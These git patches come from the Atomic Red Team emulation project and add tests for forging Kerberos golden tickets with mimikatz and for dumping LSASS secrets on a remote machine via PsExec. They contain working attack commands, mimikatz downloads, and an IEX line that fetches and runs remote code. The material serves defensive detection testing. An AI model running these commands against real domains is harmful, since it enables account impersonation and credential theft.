TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 8f68ade4..e5f5dcea 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -16,7 +16,7 @@ | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 41a8d574..89005fa7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -19316,7 +19316,82 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1558.001 + atomic_tests: + - name: Crafting golden tickets with mimikatz + auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af + description: | + Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. + This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). + The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + supported_platforms: + - windows + input_arguments: + domain_sid: + description: SID of the targeted domain, if you keep default it will automatically + get the current domain SID + type: string + default: S-1-5-21-DEFAULT + domain: + description: Targeted domain FQDN + type: string + default: example.com + account: + description: Account to impersonate + type: string + default: goldenticketfakeuser + krbtgt_aes256_key: + description: Krbtgt AES256 key + type: string + default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + executor: + name: powershell + elevation_required: false + command: "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item + $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if + default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match + \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n + \ $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID + = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n + \ $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# + create batch file with commands to run in a separate \"runas /netonly\" + session\n# so we don't purge Kerberos ticket from the current Windows session\n# + its output goes to golden.txt temp file, because we cannot capture \"runas + /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge + existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} + \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} + /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n + \ dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting + SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ + -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# + run batch file in a new empty session (password and username do not matter)\necho + \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# + wait until the output file has logged the entire attack\ndo {\n Start-Sleep + 1 # wait a bit so the output file has time to be created\n Get-Content + -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match + 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy + loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content + $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat + -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore" T1552.006: technique: external_references: diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md new file mode 100644 index 00000000..26058d91 --- /dev/null +++ b/atomics/T1558.001/T1558.001.md @@ -0,0 +1,115 @@ +# T1558.001 - Golden Ticket +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1558/001) +
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) + +Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets) + +The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.
+ +## Atomic Tests + +- [Atomic Test #1 - Crafting golden tickets with mimikatz](#atomic-test-1---crafting-golden-tickets-with-mimikatz) + + +
+ +## Atomic Test #1 - Crafting golden tickets with mimikatz +Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. +This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). +The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | string | S-1-5-21-DEFAULT| +| domain | Targeted domain FQDN | string | example.com| +| account | Account to impersonate | string | goldenticketfakeuser| +| krbtgt_aes256_key | Krbtgt AES256 key | string | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9| +| mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore +Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore + +# get current domain SID if default was used +$domain_sid = "#{domain_sid}" +If ($domain_sid -Match "DEFAULT") { + # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 + $domain = gwmi Win32_ComputerSystem | Select -Expand Domain + $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value + $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) +} + +# create batch file with commands to run in a separate "runas /netonly" session +# so we don't purge Kerberos ticket from the current Windows session +# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise +@" +>%TEMP%\golden.txt 2>&1 ( + echo Purge existing tickets and create golden ticket: + klist purge + #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit" + + echo. + echo Requesting SYSVOL: + dir \\#{domain}\SYSVOL + + echo. + echo Tickets after requesting SYSVOL: + klist + + echo. + echo End of Golden Ticket attack +) +"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat + +# run batch file in a new empty session (password and username do not matter) +echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null + +# wait until the output file has logged the entire attack +do { + Start-Sleep 1 # wait a bit so the output file has time to be created + Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { + if ($_ -match 'End of Golden Ticket attack') { break } + } +} while ($false) # dummy loop so that 'break' can be used + +# show output from new empty session +Get-Content $env:TEMP\golden.txt + +# cleanup temp files +Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore +Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` + + + + +
From b0a0bbc66e18807c5e10297eba75229764c4ec5b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:42:08 +0100 Subject: [PATCH 043/131] T1055: add new test "Remote Process Injection in LSASS via mimikatz" (#1353) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin Co-authored-by: Zakaria Addi --- atomics/T1055/T1055.yaml | 51 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 50 insertions(+), 1 deletion(-) diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 3d75a255..106f752b 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -61,4 +61,53 @@ atomic_tests: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" - name: powershell \ No newline at end of file + name: powershell +- name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: '%tmp%\mimikatz\x64\mimikatz.exe' + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: | + PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) + prereq_command: | + if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: | + #{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" + name: command_prompt + elevation_required: false # locally not, but remotely on target machine then yes From 90611a079ac2cf75352a3890adc6cfb310d3378b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 6 Jan 2021 18:42:30 +0000 Subject: [PATCH 044/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 677716c5..0fa43020 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -644,3 +644,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 9ebe7901-7edf-45c0-b5c7-8366300919db 96f974bb-a0da-4d87-a744-ff33e73367e9 9726592a-dabc-4d4d-81cd-44070008b3af +3203ad24-168e-4bec-be36-f79b13ef8a83 From 603040c6e34fdea300593c8b8869496262bfdc19 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 18:42:39 +0000 Subject: [PATCH 045/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 112 ++++++++++++++++++ atomics/T1055/T1055.md | 65 ++++++++++ 6 files changed, 185 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 67809902..e4cf0833 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -53,6 +53,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh @@ -454,6 +455,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index eb51beb2..98ae9b4c 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -101,6 +101,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell @@ -260,6 +261,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 444354bd..f97fbfa7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -117,6 +117,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] @@ -839,6 +840,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via 